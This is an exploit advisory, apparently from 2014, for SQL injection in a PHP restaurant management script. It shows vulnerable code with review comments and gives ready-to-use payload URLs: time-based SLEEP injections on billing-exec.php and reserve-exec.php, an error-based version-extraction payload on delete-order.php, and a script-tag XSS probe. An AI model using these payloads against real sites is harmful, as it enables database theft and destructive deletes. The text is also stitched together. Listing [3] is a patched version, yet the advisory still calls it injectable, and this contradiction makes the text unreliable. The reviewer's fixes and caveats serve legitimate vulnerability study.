
©2014 RESTAURANT SCRIPT. ALL RIGHTS RESERVED - SQL Injection Vulnerability

Author: jsass , Published: 22-10-2014
# Exploit Title: ©2014 RESTAURANT SCRIPT. ALL RIGHTS RESERVED - SQL Injection Vulnerability (Restaurant Script "RSv1.0.0", SourceForge project restaurantmis)
# Date : 22-10-2014
# Author : jsass
# Software Link: http://sourceforge.net/projects/restaurantmis/files/
# Version: 1.00
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM

#########################################################################################################

SQL INJECTION - in each of the scripts below the `id` query-string parameter is read with $_GET['id'] and interpolated, unescaped and uncast, into a quoted literal of an INSERT or DELETE statement. The POST fields go through the application's clean() helper; the URL parameter does not.

[1] billing-exec.php

Vulnerable code (excerpt; the closing brace of the if-block is not shown):

// Escape a request value for use inside a single-quoted MySQL string literal.
// NOTE(review): this only protects values that actually pass through it and are then
// placed between quotes; the $_GET['id'] values interpolated below never reach clean().
// Both get_magic_quotes_gpc() and the mysql_* extension have been removed from PHP 7+/8.
function clean($str) {
$str = @trim($str); // @ silences the warning raised when $str is not a string (e.g. an array from ?foo[]=bar)
if(get_magic_quotes_gpc()) {
$str = stripslashes($str); // undo legacy magic_quotes so the value is not escaped twice
}
return mysql_real_escape_string($str); // needs an open mysql_* link; without one it warns and returns FALSE
}

//Sanitize the POST values (these five go through clean() and sit inside quoted literals, so they are escaped)
$StreetAddress = clean($_POST['sAddress']);
$BoxNo = clean($_POST['box']);
$City = clean($_POST['city']);
$MobileNo = clean($_POST['mNumber']);
$LandlineNo = clean($_POST['lNumber']);
// check if the 'id' variable is set in URL
// NOTE: unlike the POST fields above, the id is never sanitized anywhere in this excerpt.

// check if the 'id' variable is set in URL
if (isset($_GET['id']))
{
// get id value -- VULN: raw query-string input, never cast to int or passed through clean()
$id = $_GET['id'];

//Create INSERT query
// $id is spliced into the quoted member_id literal below: a value such as
//   1' AND SLEEP(5) AND 'Q8'='Q8
// closes the literal and runs attacker-controlled SQL (see the exploit URL).
// Fix: $id = (int)$_GET['id']; or bind it with a prepared statement.
// Also note member_id is taken from the URL rather than from the session, so any caller
// can file billing details under an arbitrary member id (assuming no earlier auth check - not shown).
$qry = "INSERT INTO billing_details(member_id,Street_Address,P_O_Box_No,City,Mobile_No,Landline_No) VALUES('$id','$StreetAddress','$BoxNo','$City','$MobileNo','$LandlineNo')";
mysql_query($qry) ; // result is not checked; the rest of this if-block is outside the excerpt


Exploit (time-based blind; the INSERT returns nothing to the browser, so the 5-second delay is the only oracle):
http://localhost/RSv1.0.0/billing-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8
Note: every test request performs the INSERT, so each probe writes a junk billing_details row; test against a copy of the database.


[2] reserve-exec.php

// Escape a request value for use inside a single-quoted MySQL string literal.
// NOTE(review): this only protects values that actually pass through it and are then
// placed between quotes; the $_GET['id'] value interpolated below never reaches clean().
// Both get_magic_quotes_gpc() and the mysql_* extension have been removed from PHP 7+/8.
function clean($str) {
$str = @trim($str); // @ silences the warning raised when $str is not a string (e.g. an array from ?foo[]=bar)
if(get_magic_quotes_gpc()) {
$str = stripslashes($str); // undo legacy magic_quotes so the value is not escaped twice
}
return mysql_real_escape_string($str); // needs an open mysql_* link; without one it warns and returns FALSE
}

// Decide what is being reserved: a table takes precedence over a party hall.
// Whichever branch is not taken leaves its *_id / *_flag variables undefined;
// they interpolate as empty strings in the query below (with PHP notices).
if(isset($_POST['table'])){
$table_id = clean($_POST['table']); // escaped, and used inside a quoted literal -> not injectable
$table_flag = 1;
}
else if(isset($_POST['partyhall'])){
$partyhall_id = clean($_POST['partyhall']); // escaped, and used inside a quoted literal -> not injectable
$partyhall_flag = 1;
}

// check if the 'id' variable is set in URL
if (isset($_GET['id'])){

//get user id -- VULN: raw query-string input, never cast to int or passed through clean()
$id = $_GET['id'];

//Create INSERT query
// $id is spliced unescaped into the quoted member_id literal: SQL injection (see exploit URL).
// $date and $time are not assigned in this excerpt; listing [4] below shows them coming
// from $_POST via clean(). Fix: $id = (int)$_GET['id']; or use a prepared statement.
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry); // return value ignored: a failed INSERT still redirects to the success page

//redirect to the reserve success page
header("location: reserve-success.php"); // no exit after header(); harmless here since nothing follows

}else {
die("Reservation failed! Please try again after a few minutes."); // reached only when id is absent from the URL
}


Exploitable as time-based blind injection (the INSERT produces no output, so timing is the only signal); sqlmap can automate extraction against the `id` parameter.

Exploit: http://localhost/RSv1.0.0/reserve-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8
Note: each probe inserts a reservation row.


[3] delete-order.php



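// delete-order.php: remove one order by id, then send the member back to the index.
//
// Remediated version. The original built the statement as
//   "DELETE FROM orders_details WHERE order_id='$id'"
// with $_GET['id'] interpolated raw, which is the SQL injection point used by the
// exploit URL below. The value is now cast to an integer before it reaches the query,
// so it can no longer alter the statement's structure. The stray ';' that separated
// mysql_query(...) from 'or die(...)' in the listing (a parse error as printed) is
// also joined back into the usual `mysql_query(...) or die(...)` idiom.
//
// NOTE(review): the WHERE clause still filters on order_id only; nothing visible here
// ties the order to the logged-in member, so if a session exists elsewhere any member
// can delete any order (IDOR). Add an ownership condition once the session variable
// holding the member id is known.
// NOTE(review): mysql_query() returns TRUE for a DELETE that matches no rows, so the
// die() below fires only on a query error, never for an unknown order id.

// check if the 'id' variable is set in URL
if (isset($_GET['id']))
{
    // get id value, forced to an integer so it cannot break out of the query
    $id = (int) $_GET['id'];

    // delete the entry ($id is an int: no quotes needed, nothing to inject)
    $result = mysql_query("DELETE FROM orders_details WHERE order_id=" . $id)
        or die("The order does not exist ... \n");

    // redirect back to the member index
    header("Location: member-index.php");
    exit;
}
else
// if id isn't set, redirect back to member index
{
    header("Location: member-index.php");
    exit;
}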

Injectable via time-based blind, boolean-based blind (redirect vs. the fixed "The order does not exist" message) and, where MySQL error text is echoed, error-based techniques.



Exploit (error-based; the FLOOR(RAND(0)*2) GROUP BY trick forces a "Duplicate entry" error whose text embeds Version() between the markers 0x5138203e3e = "Q8 >>" and 0x3c3c205138 = "<< Q8"):
http://localhost/RSv1.0.0/delete-order.php?id=1' AND (SELECT 1414 FROM(SELECT COUNT(*),CONCAT(0x5138203e3e,Version(),0x3c3c205138,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Q8'='Q8
Caveat: the code shown above only prints a fixed string when the query fails and never echoes mysql_error(), so the version string is only visible if MySQL errors are displayed elsewhere (e.g. via display_errors); otherwise this payload still works as a boolean oracle (die message vs. redirect). Also note a successful request deletes the order with that id - do not run this against production data.


Reflected XSS is also claimed for the same parameter:

http://localhost/RSv1.0.0/delete-order.php?id=1'><script>alert('jsass')</script>

Caveat: the delete-order.php code shown above never echoes $id (it only redirects or prints a fixed message), so this cannot be confirmed from the excerpt; verify against the full file or the error output of a misconfigured server before reporting it as XSS.


[4] reserve-exec.php (fuller excerpt of the same sink as [2], showing where $date and $time come from)


// Decide what is being reserved: a table takes precedence over a party hall.
// Whichever branch is not taken leaves its *_id / *_flag variables undefined;
// they interpolate as empty strings in the query below (with PHP notices).
if(isset($_POST['table'])){
$table_id = clean($_POST['table']); // escaped, and used inside a quoted literal -> not injectable
$table_flag = 1;
}
else if(isset($_POST['partyhall'])){
$partyhall_id = clean($_POST['partyhall']); // escaped, and used inside a quoted literal -> not injectable
$partyhall_flag = 1;
}

// Reservation date/time: escaped by clean() like the other POST fields (clean() is defined
// in listing [2]; this excerpt omits it).
$date = clean($_POST['date']);
$time = clean($_POST['time']);

//check if the id is set at the link
if (isset($_GET['id'])){

//get user id -- VULN: raw query-string input, never cast to int or passed through clean()
$id = $_GET['id'];

//Create INSERT query
// $id is spliced unescaped into the quoted member_id literal: SQL injection (see exploit URL).
// Fix: $id = (int)$_GET['id']; or use a prepared statement. member_id also comes from the
// URL rather than the session, so a caller can reserve on behalf of any member id
// (assuming no earlier auth check - not shown).
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry); // return value ignored: a failed INSERT still redirects to the success page

//redirect to the reserve success page
header("location: reserve-success.php"); // no exit after header(); harmless here since nothing follows

}else {
die("Reservation failed! Please try again after a few minutes."); // reached only when id is absent from the URL
}


Exploit (same sink as [2], time-based blind): http://localhost/RSv1.0.0/reserve-exec.php?id=16' AND SLEEP(5) AND 'Q8'='Q8

#########################################################################################################

Greets: Sec4ever.com & alm3refh.com
